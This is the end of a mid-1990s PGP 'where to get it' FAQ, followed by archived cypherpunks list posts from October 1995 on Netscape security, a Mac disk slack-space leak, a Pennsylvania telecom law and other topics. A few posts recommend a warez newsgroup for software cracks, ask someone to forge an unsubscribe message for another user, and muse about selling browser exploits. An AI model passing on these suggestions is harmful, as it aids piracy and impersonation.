ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/file/
(see ftp://ftp.csn.net/mpj/README for the ???????)
ftp://ftp.miyako.dorm.duke.edu/mpj/crypto/file/


HOW DO I SECURELY DELETE FILES (DOS)?

If you have the Norton Utilities, Norton WipeInfo is pretty
good.  I use DELETE.EXE in del110.zip, which is really good at
deleting existing files, but doesn't wipe "unused" space.
ftp://ftp.csn.net/mpj/public/del120.zip
ftp://ftp.demon.co.uk/pub/ibmpc/security/realdeal.zip


WHAT DO I DO ABOUT THE PASS PHRASE IN MY WINDOWS SWAP FILE?

The nature of Windows is that it can swap any memory to disk at
any time, meaning that all kinds of interesting things could
end up in your swap file.
ftp://ftp.firstnet.net/pub/windows/winpgp/wswipe.zip


WHAT EVER HAPPENED TO PGPfone(tm)?

PGPfone is in beta test for Macintosh users.  A Windows 95 version
is being developed.

http://web.mit.edu/network/pgpfone
ftp://net-dist.mit.edu/pub/PGPfone/README
ftp.hacktic.nl/pub/pgp/pgpfone


WHERE DO I GET NAUTILUS?
Bill Dorsey, Pat Mullarky, and Paul Rubin have come out with a
program called Nautilus that enables you to engage in secure
voice conversations between people with multimedia PCs and
modems capable of at least 7200 bps (but 14.4 kbps is better).
See

ftp://ripem.msu.edu/pub/crypt/GETTING_ACCESS
ftp://ripem.msu.edu/pub/crypt/other/nautilus-phone-0.9.2-source.tar.gz

ftp://ftp.csn.net/mpj/README
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/voice/naut092.zip

ftp://ftp.netcom.com/pub/mp/mpj/README
ftp://ftp.netcom.com/pub/mp/mpj/I_will_not_export/crypto_???????/voice/naut092.zip

ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS
ftp://miyako.dorm.duke.edu/mpj/crypto/voice/naut092.zip

ftp://ftp.dsi.unimi.it/pub/security/crypt/cypherpunks/nautilus

The Colorado Catacombs BBS 303-772-1062

ftp://ftp.ox.ac.uk/pub/crypto/misc


HOW DO I ENCRYPT MY DISK ON-THE-FLY?

Rather than manually encrypting and decrypting files, it is
sometimes easier (and therefore more secure, because you are
more likely to use it) to use a utility that encrypts or
decrypts files on the fly as you use them in your favorite
applications.  This also allows you to automatically encrypt
temporary files generated by your applications if they are on
the encrypted volume.

Secure File System (SFS) is a DOS device driver that encrypts
an entire partition on the fly using SHA in feedback mode.

Secure Drive also encrypts an entire DOS partition, using IDEA,
which is patented.

Secure Device is a DOS device driver that encrypts a virtual,
file-hosted volume with IDEA.

Cryptographic File System (CFS) is a Unix device driver that
uses DES.

http://www.cs.auckland.ac.nz/~pgut01/sfs.html
ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/disk/
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/disk/
(see
ftp://ftp.csn.net/mpj/README for the ???????)
ftp://miyako.dorm.duke.edu/mpj/crypto/disk/
ftp://ftp.nic.surfnet.nl/surfnet/net-security/encryption/disk/
ftp://ftp.demon.co.uk/pub/ibmpc/secdev/secdev14.arj


EMAIL/PGP LINKS

http://cag-www.lcs.mit.edu/mailcrypt/ (EMACS LISP)


WHERE IS PGP'S COMPETITION?

RIPEM is the second most popular freeware email encryption
package.  I like PGP better for lots of reasons, but if for
some reason you want to check or generate a PEM signature,
RIPEM is available at ripem.msu.edu.  There is also an
exportable RIPEM/SIG.

ftp://ripem.msu.edu/pub/GETTING_ACCESS


HOW DO I PUBLISH MY PGP PUBLIC KEY?

Send mail to one of these addresses with the single word "help"
in the subject line to find out how to use them.  These servers
sychronize keys with each other.

pgp-public-keys@keys.pgp.net
pgp-public-keys@keys.de.pgp.net
pgp-public-keys@keys.no.pgp.net
pgp-public-keys@keys.uk.pgp.net
pgp-public-keys@keys.us.pgp.net
pgp-public-keys@burn.ucsd.edu
pgp-public-keys@pgp.cc.gatech.edu
pgp-public-keys@goliat.upc.es
pgp-public-keys@demon.co.uk
pgp-public-keys@dsi.unimi.it
pgp-public-keys@ext221.sra.co.jp
pgp-public-keys@fbihh.informatik.uni-hamburg.de
pgp-public-keys@jpunix.com
pgp-public-keys@kiae.su
pgp-public-keys@kr.com
pgp-public-keys@kram.org
pgp-public-keys@kub.nl
pgp-public-keys@nexus.hpl.hp.com
pgp-public-keys@pgp.ai.mit.edu
pgp-public-keys@pgp.barclays.co.uk
pgp-public-keys@gondolin.org
pgp-public-keys@pgp.dhp.com
pgp-public-keys@pgp.hpl.hp.com
pgp-public-keys@pgp.iastate.edu
pgp-public-keys@pgp.kr.com
pgp-public-keys@pgp.mit.edu
pgp-public-keys@pgp.ox.ac.uk
pgp-public-keys@pgp.pipex.net
pgp-public-keys@srce.hr
pgp-public-keys@sw.oz.au
pgp-public-keys@uit.no
pgp-public-keys@vorpal.com
pgp-public-keys@nic.surfnet.nl

WWW interface to the key servers:
http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
http://www-lsi.upc.es/~alvar/pks/pks-toplev.html

For US $20/year or so, you can have your key officially certified
and published in a "clean" key database that is much less
susceptible to denial-of-service attacks than the other key
servers.  Send mail to
info-pgp@Four11.com for information, or
look at
http://www.Four11.com/

PGP public keys which are stored on SLED's Four11 Key Server are
now retrievable by fingering UserEmailAddress@publickey.com.
Example:  My e-mail addresses is mpj@csn.org
finger mpj@csn.org@publickey.com

My key (mpj8) is at Four11.com, at
ftp://ftp.csn.net/mpj/mpj8.asc,
on the key servers, on my BBS, and available by finger.


WHICH FAQ IS THE OFFICIAL ONE?

The main alt.security.pgp FAQ is published by Jeff A. Licquia

<jalicqui@prairienet.org> and is available at

ftp://ftp.prairienet.org/pub/providers/pgp/pgpfaq.txt

This shorter FAQ just covers a few of the most frequent
questions and points you to the main FAQ for more answers.
This file is

ftp://ftp.csn.net/mpj/getpgp.asc,

There are some other periodic FAQ-related postings, too, like
the miniFAQ posted by Andre Bacard, which is more about
promoting the use of PGP than where to get it or how to use
it.

FAQs are also posted to
news.answers and
alt.answers, and
archived at rtfm.mit.edu.


CAN I COPY AND REDISTRIBUTE THIS FAQ?

Permission is granted to distribute unmodified copies of this FAQ.  This
information is also in http://www.csn.net/~mpj, which you may link to or
adapt for use at your own web sites.
                 ___________________________________________________________
                |                                                           |
|\  /| |        | Michael Paul Johnson  Colorado Catacombs BBS 303-772-1062 |
| \/ |o|        | PO Box 1151, Longmont CO 80502-1151 USA   Jesus is alive! |
|    | | /  _   | mpj@csn.org aka mpj@netcom.com m.p.johnson@ieee.org       |
|    |||/  /_\  | ftp://ftp.csn.net/mpj/README.MPJ          CIS: 71331,2332 |
|    |||\  (    | ftp://ftp.netcom.com/pub/mp/mpj/README  -. --- ----- .... |
|    ||| \ \_/  | PGPprint=F2 5E A1 C1 A6 CF EF 71  12 1F 91 92 6A ED AE A9 |
                |___________________________________________________________|


-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAwUBMICOWPX0zg8FAL9FAQEO1AQAvLSMXX9J/nZ/4Wc/TTS9a60e+G5vbvTR
KU2+KixGhKfHkH5eb9mHwUtuDTiPJSRvnyfx0EOrgs7b5cC8hZsxKnlyfNnsvEG+
fdxGxy1h90L69CUVFD5CGvIbTlTo7a1xT5tYj/knqTO0OH4WOZVVh60uhGpuzevb
0+99R2mUJoA=
=H2Bc
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 14 Oct 95 23:48:32 PDT
To: cypherpunks@toad.com
Subject: Re: PA Remailer Concerns
Message-ID: <199510150647.XAA25530@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone examined the legislative history associated with this statute?

I would be surprised if they were singling out anonymous remailers.  They may have had other concerns regarding phone abuse, e.g., long distance fraud.  

Then again, I could be full of it...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 15 Oct 95 00:26:07 PDT
To: cypherpunks@toad.com
Subject: Idea Futures
Message-ID: <aca6045f180210043fe9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:03 PM 10/14/95, s1018954@aix2.uottawa.ca wrote:
>On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote:
>
>>       I have a better idea.  How about an open market in break-in
>> software.  We crack Netscape and offer the crack code to the highest
>> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
>> outbid the competition by a factor of 2 to get the details of the hole.
>> Here's how it works:
>>
>Funny that you mention it, the other mailing list (or rather set of lists)
>I'm on is devoted to a just such market system. The Idea Futures home page
>is at http://if.arc.ab.ca/~jamesm/IF/IF.shtml. You'll find a few familiar
>faces.

Robin Hanson, who developed (so far as I know) the modern focus on idea
futures, was an active Bay Area person. His interests parallel ours, and I
think he was on the CP list for a while back in '92.

(Some of his game theory simulations--on betting markets and
preference-revealing--were a main inspiration for the "Crypto Anarchy Game"
I put on at the first Cypherpunks meeting in '92.)

--Tim May



Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sat, 14 Oct 95 21:44:05 PDT
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: Re: mental cryptography
Message-ID: <v02130502aca5e351623c@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Oct 1995, Nathan Loofbourrow wrote:
> Boy, and isn't it fun to receive all the bounce messages from every
> post to cypherpunks?

Part of the problem is his provider who is sending the bounce messages to
the list and not the list owner (as shown in the Sender Header).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 14 Oct 95 22:06:46 PDT
To: cypherpunks@toad.com
Subject: Macintosh [and perhaps other OS] Security Alert
Message-ID: <199510150505.BAA10774@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A number of months ago, I discovered that various Macintosh "unused
diskspace" wipe utilities (Norton, Burn) fail to wipe the unused
slackspace at the end of the last block allocated to a file. This leaves
NumberOfFiles*512Bytes/2 = several kB of recoverable data on your average
drive.

I had assumed that this data was left there by other files previously
using the same block. This would certainly be a problem. But I discovered
that matters are much worse. The Macintosh file system will always write
an entire block. The extra data can therefore not come from an old file.
It comes from the memory space immediately following the data to be
written. This is a very serious security risk. Your decrypted secret key,
ANYTHING in memory might be written to disk and remain there, unerasable
by disk wipe utilities.

I would appreciate some comments.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMICWfCoZzwIn1bdtAQFDyAF/QLI0RJQ/E2+wktITd+3SBCCB8L24Y/vV
rq0hPikG9pELYcC/bMwXvD+utoW/E8NQ
=IHqi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 14 Oct 95 22:18:28 PDT
To: cypherpunks@toad.com
Subject: Re: Anguilla Cypherpunks Meeting
Message-ID: <199510150516.BAA10814@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.3.89.9510131114.A70910-0100000@aix2.uottawa.ca>,
s1018954@aix2.uottawa.ca wrote:

> Really? I thought except for incomes taxes, US laws only apply in American
> territory as opposed to applying to American people wherever they are (as 
> I heard Germany's does).

US laws not only apply to US citizen abroad, they apply to non-US citizens
living abroad. See Noriega.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMICZOioZzwIn1bdtAQEUoAGA3Q3nk9e3HA5l1jzG/DyJ8MjcZ+jfx/v3
4UM43jJZwTWFIZ7DLw9O44wvFHVMlj6K
=n1+8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 14 Oct 95 22:21:59 PDT
To: cypherpunks@toad.com
Subject: Re: applications
Message-ID: <199510150520.BAA10825@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <m0t3rzZ-000K7TC@mail.infinet.com>, zoetrope@infinet.com
(cYberpUnc) wrote:

>         I know this isnt what you guys generally talk about but I was curious.
> Off the top of your head do you know of any sites where I can get kracking
> apps for macs?  Any information would be greatly appreciated.

I suggest <news:alt.binaries.warez.mac>. Get C&N (Cracks and Numbers).
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMICaDioZzwIn1bdtAQFASQF/ausHvyFqDCdGQDwiY2zjGxhJ2DpHYb86
yGjpgvrqjT1YE98N2bTeS/Ejm1pxrXVl
=4wZO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 14 Oct 95 22:29:18 PDT
To: cypherpunks@toad.com
Subject: Re: Yes, indeed the PA law is for real!
Message-ID: <199510150527.BAA10870@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9510141649.AA20952@cfdevx1.lehman.com>, rfb@lehman.com (Rick
Busdiecker) wrote:

> I'm guessing that you're referring to this part of the law:
> 
>   (1) [makes or possesses any instrument, apparatus, equipment or]
>   makes, distributes, possesses, uses or assembles an unlawful
>   telecommunication device or modifies, alters, programs or reprograms
>   a telecommunication device designed, adapted or which can be used:

Own a non-approved computer (not using Government approved software) go to jail.
Historic comment: I predicted this on this very list ages ago. Even
mentioned "You read it here first".
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMICbwyoZzwIn1bdtAQEaMgGAs3ZFT2TmWbHxQg1xtkJKPUri4TBlpjbx
73dwbNh1TC0Ls+QG/q1xDStqc1rvMFs1
=BWyG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 14 Oct 95 22:45:17 PDT
To: cypherpunks@toad.com
Subject: Re: [noise] Re: Identity database, another attempt...
Message-ID: <199510150543.BAA10916@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SOL.3.91.951014125249.28891A-100000@chivalry>,
ses@tipper.oit.unc.edu (Simon Spero) wrote:

> This probably dates back to the time when a palestinian group tried to 
> blow up an El Al flight from London by persauding the pregnant Irish 
> girlfriend of one to carry a package for a friend. Flights from London 
> have had the spiel ever since. El Al still does the best pre-flight 
> screening (much more detailed questioning, and the security staff 
> actually listen to the answers.

Agreed. Security at Heathrow is impecable. Two guys armed with
Heckler&Koch MP-5 submachine guns every 25 meters. Expect to see the same
on US streets before long.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMICffioZzwIn1bdtAQGFBQGAig+QNg+1Zcbmbz3MXsz3EpV8dDHKmpFo
xMCY3+yXMHAqCELZLecbV59kgx/e0m2q
=1K8M
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Sun, 15 Oct 95 02:21:45 PDT
To: "cypherpunks@toad.com>
Subject: Karl Hess - L.A. area meeting
Message-ID: <199510150931.CAA13451@Chico.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: J. Kent Hastings * EMC.Ver #2.5.02 ] --

-----BEGIN PGP SIGNED MESSAGE-----

"Extremism in the defense of liberty is no vice, and let me  
remind you, moderation in the pursuit of justice is no virtue." 
 -- Aristotle, and a Goldwater speechwriter, but not Karl Hess. 

Politically Barry's Boy, Karl was often credited with Goldwater's 
most famous line, but he denied it when interviewed. Karl 
announced his Libertarian position in the book \Dear America\, 
followed by \Community Technology\, and \Capitalism For Kids\. 
 
     ---  T H E   K A R L   H E S S   C L U B  --- 
now in its second year of almost monthly dinners, invites you
to its sixteenth meeting on Monday, October 16, 1995.

     New Developments In Conspiracy Theory, Part II
     O N E   B A N K   T O   R U L E   U S   A L L

Last month we heard some "Conspiracy Classic." For 
Hallowe'en Partyarch, Paleolibertarian and Agorist tell us 
what's at "stake" in the latest Bankster cannibal 
bloodfeast and summon Murray Rothbard back from the grave 
to repel these vampires with a Cross of Gold!

Place: Marie Callender's, 4356 Lincoln Blvd., 
Marina del Rey (at west end of Marina del Rey [90] Fwy).
Time: 7:00 p.m. for dinner; 8 p.m. announcements; 
8:15 program.
Speakers: Wally Conger, SEK3, and Bob Weber.
Charge: $13.00 for program with buffet dinner 
including full-salad bar, roast turkey entree, 
and choice of three pies for dessert.
Tax and tip included!
Next Month: J. Neil Schulman Fires Back with 
\Self-Control, Not Gun Control\.
Coming soon: Robert Anton Wilson, Dr. John Hospers,
and Brad Linaweaver.

Posted by J. Kent Hastings, zeus@pinsight.com
http://www.pinsight.com/~zeus/
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIDNTzTxxI221vktAQESEgQAnojLCPg0+43EGBtYSMQHr34CvWs0Xc5U
2LidnuEI9w9awBiBuuVWuWfVk7YEpq2UWIe1Xr/8jZoWtjpEkIeLQRjt9D2WQHml
Vt2MiuIXbpcuc7GAhio7gMC7M5rsIVoxD6xd6MthcDOhbUa61a7xVma/QhIyyhcK
17MhZMeBl8Y=
=wGp1
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 14 Oct 95 23:52:52 PDT
To: cypherpunks@toad.com
Subject: Re: mental cryptography
Message-ID: <199510150651.CAA11041@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <v02130502aca5e351623c@[166.84.254.3]>, hal9001@panix.com
("Robert A. Rosenberg") wrote:

> On Sat, 14 Oct 1995, Nathan Loofbourrow wrote:
> > Boy, and isn't it fun to receive all the bounce messages from every
> > post to cypherpunks?
> 
> Part of the problem is his provider who is sending the bounce messages to
> the list and not the list owner (as shown in the Sender Header).

Would some kind soul please fakemail an unsub? [I got to get some sleep...]

TIA,
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMICvWyoZzwIn1bdtAQFI5AGAjYxCDWzpj1NTSHWyyV2S/iZfq3E6STH/
nYgkXgS0JyV8qiMKuo2U/d1rpb8wxQdg
=i/BL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cedric Ingrand" <cedric@isicom.fr>
Date: Sat, 14 Oct 95 18:06:30 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Netscape rewards are an insult
Message-ID: <199510150106.CAA29348@s2.isicom.fr>
MIME-Version: 1.0
Content-Type: text/plain


 
> 	I have a better idea.  How about an open market in break-in
> software.  We crack Netscape and offer the crack code to the highest
> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
> outbid the competition by a factor of 2 to get the details of the hole.

You're talking gaping security holes. They're merely talking bugs. I
don't know if it's already been covered elsewhere, but I saw Jim
Clark at a press conference in Paris a couple of weeks ago, and he
more or less laid out what he intended to do about security:

"First of all, I am chairing an audit commitee for security. All new 
security-related and encryption-related mechanisms that we build into 
our products has to go through this audit commitee before being 
released. The audit commitee hires outside auditors, security 
auditors, particularly RSA and experts out of academia, Ron Rivest 
from MIT and people like this to do the audit of our security 
systems. Another thing we're doing is publishing the source code 
which does the security so people can just see what the algorithms 
are. Had we done that in the first place, if we had published our 
source code, people wouldn't say 'ha ha! It's easy to guess that 
you're using this gate as the starting point of the random number'. 
So we think that by publishing the algorithms, having a security 
audit by an outsider auditor... it's sort of like the accounting 
profession, they have an audit commitee on the board of directors, 
the audit is actually done by an outside financial institution and to 
some degree it's exactly what's happening in security. We think that 
we were the first company to introduce this technology to the 
internet and so we were the first company to come under attack. We 
were careless, and we're not going to be careless in the future."

I haven't seen Netscape deliver on this promise of publishing their 
encryption code, so I'll keep the promise on tape for a little while 
(-:

Best, Cedric.

 
---------------------------------------------------------
Cedric Ingrand - cedric@planetepc.fr - +33.1.43.98.88.56.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Sun, 15 Oct 95 04:37:08 PDT
To: cypherpunks@toad.com
Subject: TSB_pbs
Message-ID: <BBPgwkkAsmsM085yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From The Economist, Oct. 7, p.78:

   TSB, a British bank, held a launch party in August
   at Cyberia, London's first "Internet cafe", for its
   Digital Trip home page, aimed at attracting student
   customers.

I assume this refers to TSB Bank Channel Islands Limited, 8 David
Place, PO Box 597, St. Helier, Jersey (NOT Joisey!), JE4 8XW.

When I last checked (a couple of years ago), TSB offered Offshore
Premium Accounts -- interest-bearing checking accounts that pay 11.5
percent interest per annum on a minimum deposit of 2000 pounds, as
well as providing a VISA debit card.  TSB is said to be the tenth
largest bank in the world.  Quite an interesting addition to the
Net...anyone checked out their home page?

BTW, the American PBS "Frontline" show on Tuesday, Oct. 31 (in the
Denver area, anyway) will discuss "High Stakes in Cyberspace -- the
business rush to stake claims in cyberspace, otherwise known as the
Internet, may someday create a cyber-revolution."  Hopefully it will
be a worthy successor to their show about Caribbean money laundering,
though the blurb's conflation of cyberspace with the Internet is not
encouraging...

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIDwuFRRFMq4NZY5AQECOgQAm1FJQyni4U7ulKvT8Zd3P1pEBieKXeqo
rxaCA14K/MhaTnaCcWix0vvPYzFjgnspxUpc7PtuP46w++ilrfZiYDM1BZ1+HpkZ
MZaSiH8W+cUkQAxDTuAVNve9PM8zj8Qv+CQ7mABqLu5+f93GubUQtMElEmikR69J
kL/2ewMllI4=
=O2Py
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 15 Oct 95 06:00:30 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199510151259.FAA03263@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


>I want to see Netscape succeed, but when you hear about things like product
>being released on the net without warning those people responsible for
>supporting it, bug reports being ignored so a ship date can be made, and the
>like, it makes you really wonder.  I am finding problems with 2.0b1 that
>could have been found just by using the product for a couple of days!  Most
>of the problems I have seen with Netscape could be solved with better
>communications between departments within the company and some strong
>testing procedures.
>
I totally agree with this. There are an awful lot of GPFs I've been experiencing with 2.0 that I never experienced with 1.2, and I am still trying to figure out that cause. The first one happened like 5 minutes after I ran the program whilst it was loading the Netscape homepage! Another irritating one that should have been caught is the download time indicator. When I download a file, the estimated time taken is shown in hours!

These trivial problems are really quite inexcusable, and should've been caught with good quality assurance before it even went out the door.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 15 Oct 95 07:23:07 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
Message-ID: <199510151421.HAA08833@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Oct 1995, Rob L wrote:

> Actually, it is not jeapordy that they get from doing so, but some of the 
> best bug finders and security experts on the planet.. for close to free.

Actually, this is a very dangerous game to play, because realistically
Netscape gets both, foe and friend.  And they risk not only the entire 
company by taking this action, but they also pose risk to the public

They might get someone who responsibly tries to point out an incredibly
poor design methodology within ALL of Netscape's code -- the existing
installed code base as well as the new beta code.  Someone who points out 
this fatal design flaw to the public and not only to Netscape.

Or they might confront someone who announces that numerous pointers have
been placed in roulette programs making the Web under Netscape a little
more like playing Russian Roulette, rather than safe, fun entertainment.
Netscape clients might face a customized plexus, one that delivers dynamic
documents.  One time in six (if you're running CURRENT Netscape release
software) it deletes your WIN.INI.  Some machine in Bucharest reaches
right out, and wipes you clean.  Or maybe it just downloads all of your
Quicken files. 

Netscape is clearly not thinking clearly, here.

The issue here isn't "Bugs" and Netscape's so-called Bugs Bounty program. 
It's a broader question of design methodology and of design process.  Does
Netscape have a product that has any worth and utility??  Does Netscape
have a product which can go through a "Product Evaluation" and then a
"Certification Evaluation" as set out in the US Department of Defence's
Orange Book??  Or does Netscape's product fail the giggle test. 

> If hackers can find 10 bugs before final release, it means there is a 
> good chance that they will fix those bugs before final release.
> 
> Think of it this way.. you practice a new task until you are competent at 
> it.. beta code is the same.. it is the practice or scratch code that may 
> be refined into the final product.

I'll beg to differ on this one.  This is not about hackers, nor is this
about crackers.  We are not talking about some shareware game program
here.  Nor are we talking about a word processor, spreadsheet, or draw
program.  We are talking about a program that has a different mission
profile. 

The standard here is different.  

A bug in code that makes your system freeze is different than a sloppy
design methodology that allows someone to literally take complete control
of your machine from any other machine in the world, whether that machine
is foreign or domestic. 

Code which seeks to secure a public network connection, calls for a
different programming altitude, than writing common PC code. The
tolerances are different, the expectations are different, and the
challenge (which was summarized most cogently by a UK friend) distills to
a single basic issue. 

           How do you invite a few billion people into your 
           home without having one of them nick the silver??

Evaluation of technical computer security effectiveness is not
accomplished by the release of "practice code".  It has to start from the
ground up.  And it is certainly not assisted by having a corporate
communications policy that is geared to NOT opening a communications pipe
with someone who has attempted to offer constructive technical criticism. 

Let me make this absolutely clear.

It should not be up to non-US citizens like myself to safe-guard US
economic security, and protect vital national interests.  It is not my job
and certainly not my responsibility to protect the international public
and Fortune 500 companies from poor security. 

When that attempt is made however, the effort should not be stymied by
Netscape's thinly veiled attempt at information free-loading through
public-relations puffery.  From this vantage point, Netscape's press
releases have the stench of some two-bit penny stock hustler -- something
I'd expect from some Vancouver Stock Exchange promoter, rather than the
standard expected of a company with a Two Billion USD ($2,000,000,000)
market capitalization. 

After emailing the company more than two days ago, I would hope that a
communications channel would have been opened, or alternatively I would
have held out a hope that someone from Sun or Netscape might have made an
official comment here or publically.  I would have expected something 
other than a stone-walling silence.

My Friday the Thirteenth post obviously has people shaken. Clearly, Friday
was not the day to comment about this serious problem.  There was no
utility in causing panic and disrupting trading in Netscape stock,
especially in a market that can only be characterized as frothy.  But now
here we stand, many hours and days later, with the questions raised
remaining unaddressed, and with my copyright restriction on my Friday 
post hereby, and herein explicitly waived.

The question is no longer simply a question of whether Netscape can
produce quality code, but a new question rises on the horizon.  Does
Netscape have the management depth and experience to meet daily corporate
requirements??  And is the promise of Internet commerce whether put
forward by Netscape, Microsoft or AT&T simply a pipe dream. 

A very risky game, they like to play ...

Or since I had already spoken of Dominick Dunne on Friday, perhaps a turn
this Sunday to Johnnie Cochrane and his fine choice of words: 

          "Whom will I trust as I will adders fang'd
          They bear the mandate; they must sweep my way,
          And marshall me to knavery.  Let it work;
          For tis the sport to have the engineer
          Hoist with his own petar: and 't shall go hard ..."


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Sun, 15 Oct 95 04:41:40 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Idea Futures
In-Reply-To: <aca6045f180210043fe9@[205.199.118.202]>
Message-ID: <Pine.3.89.9510150743.C69264-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 15 Oct 1995, Timothy C. May wrote:

> (Some of his game theory simulations--on betting markets and
> preference-revealing--were a main inspiration for the "Crypto Anarchy Game"
> I put on at the first Cypherpunks meeting in '92.)
> 
How did that work out anyway? What were the rules and usual outcomes?
(Got a file on it anywhere? In your faq?)
Sounds like something that'd be nice to implement over the net. Great way
to get everyone's productivity reduced to zero. (insert wry smile) 

TIA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 15 Oct 95 05:06:41 PDT
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: Cybersecurity
In-Reply-To: <9509250107.AA05910@cfdevx1.lehman.com>
Message-ID: <Pine.SUN.3.91.950925060508.23639B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 24 Sep 1995, Rick Busdiecker wrote:

